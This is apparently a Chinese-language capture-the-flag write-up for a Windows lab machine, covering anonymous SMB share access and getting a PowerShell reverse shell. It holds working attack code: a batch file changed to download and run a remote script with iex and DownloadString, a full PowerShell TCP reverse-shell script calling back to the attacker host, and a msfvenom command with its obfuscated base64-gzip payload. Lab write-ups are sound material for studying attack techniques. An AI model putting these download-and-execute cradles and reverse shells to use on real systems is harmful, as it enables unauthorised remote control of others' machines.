靶场:The Hackers Labs
地址:https://thehackerslabs.com/quokka/
系统:Windows
内容:powershell反弹shell的生成和调用
这个机器比较简单,就不详细写过程了。
第一步就是利用空账号登录smb,递归下载所有文件。
└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ [+] WIN-VRU3GG3DPLJ\null:
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ Compartido READ,WRITE
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ IPC$ IPC remota
└─$ smbclient //$IP/Compartido -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *下载的文件里会发现两个.bat批处理文件,系统每隔一分钟都会执行这两个文件,将其内容换为调用powershell的内容即可。
bat文件修改如下:
└─$ cat mantenimiento.bat
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.56.101/rev.ps1')"
exitrev.ps1是我们生成的powershell格式的shell。有几种方法,一种是直接复制粘贴一段最精典最简单的代码:
$client = New-Object System.Net.Sockets.TCPClient("192.168.56.101", 1234)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$writer.AutoFlush = $true
while ($true) {
$command = (New-Object System.IO.StreamReader($stream)).ReadLine()
if ($command -eq "exit") { break }
$output = cmd.exe /c $command 2>&1
$writer.WriteLine($output)
}
$client.Close()另外,还有可以用msfvenom生成,但要注意格式。
└─$ msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f raw > rev.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1816 bytes生成的rev.ps1不能直接使用,需要将开头部分的乱码删除。
└─$ cat rev.ps1
`1dP0R
8u};}$uXX$fӋI:I41
KXӋЉD$$[[aYZQ__Z]jPh1oջVh<|
uGrojSpowershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4s{2}ACOUOmcCA5VVXW/bNhR996+4M'+'LRFQmzC9tpiDZBinpoOAbLWqNLl'+'wTAQmrqOtdCkR1KxjcT/vaREfThO0FUPtsR7eXh4'+'7rnk{2}hfMZFLAX2j6NzhnPENhoPPYAfsEGwbn8Bk3/S/zf5EZ6F/v1viZrtAOGmLz4yK/SibfNH7EBc25iRWmNpJRri1EYFSOddZEye2OPMuw462RKrez7ywqimu5QWW/LDso4hOq6Cos36eJUZm4mwWxXK2oSHuHo4nmT{2}pn{1}x/lRnBJ02{2}08phKMtQavAArmeYcHcE/w{1}jKlGwBYbUM9P'+'E/6M4zkXaj{2}ljOK+byTBsUqOzkabKz7yviVEsku0ejyTVbX/mM2XD025vjiUQbqoxb169cRH2Jzlt5Y8ZwbSx{1}WY6wpLJ/ja7CB1QajxnX0'+'K2Sv8Q8nviFusP3{2}zJ89zt5+44MB8Nuz23Er94pFdRG{2}V05uiU6sU5LijFLsyFYFqjk58zS9fVosdOaJxXYKwSR5SozO5JUqaFfvxcsrKuwFz4G1xZ9D32qYXow5yuupMEYlckWGaMG/6E8S6mzXkw5n1N2P4uiF+iQcW6Wzrdu0li/Jk0{1}cs57XcP1cNT1fNpwtU7NPttCTuc7{1}9PZLHD/zpADQkYD+zz98jjYe61RpFU4nBrcGoKCydS5/exsnMSXl5HT/0+XE3ZvrG3lRsPENVayRM5B5ULYbLDq5NpatwunEKB4OHNfwjX+qR2zhaoDTK7WuWmCtyKW653K7pYGwjiCvzOmpJYLA7FUa6kKQQmM3W{2}uSYNCi/2AKbkVt8Kb0stBb'+'mxpM'+'Gw21hv0m{1}9y'+'heLOLNs2qlq6baQjH/2cStPTG'+'VxZSCeLPw5{2}zfPnuVazPkl1QdnSci5B{2}RP1cdNkNbTdEx6c0hGpdlseaBVS9HQpHuQ99i+2a6uttnrXKPu2pTbLjGMYBlnhun{2}'+'TX5GmYemxH{1}x6EB'+'ywj6AvEAZHkl44/TC9tlq+dmH4NnUppND4wmveoNhmo45KC82fFsXuKlEhyKJn1bS96Yp5tG/oVwdfCT768OsQnuBLbvolKnjzHECNoBCkAj6Fk0kCJ/a'+'/0P9KssLDEZlQs3TRD3DS{1}GwdkQCVkmo6mB0s1mJdxAnjSFUYvcT{1}vP1hW23bOTbw//JvA/NDx7YNe+TXas4nnutlfRf6{1}8cf7TG'+'XGv1+inasbqi2YZprKzFyXd1V/tc6s77m69r5++o7sN+WFKw{2}AAA{0}')-f'=','g','I')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"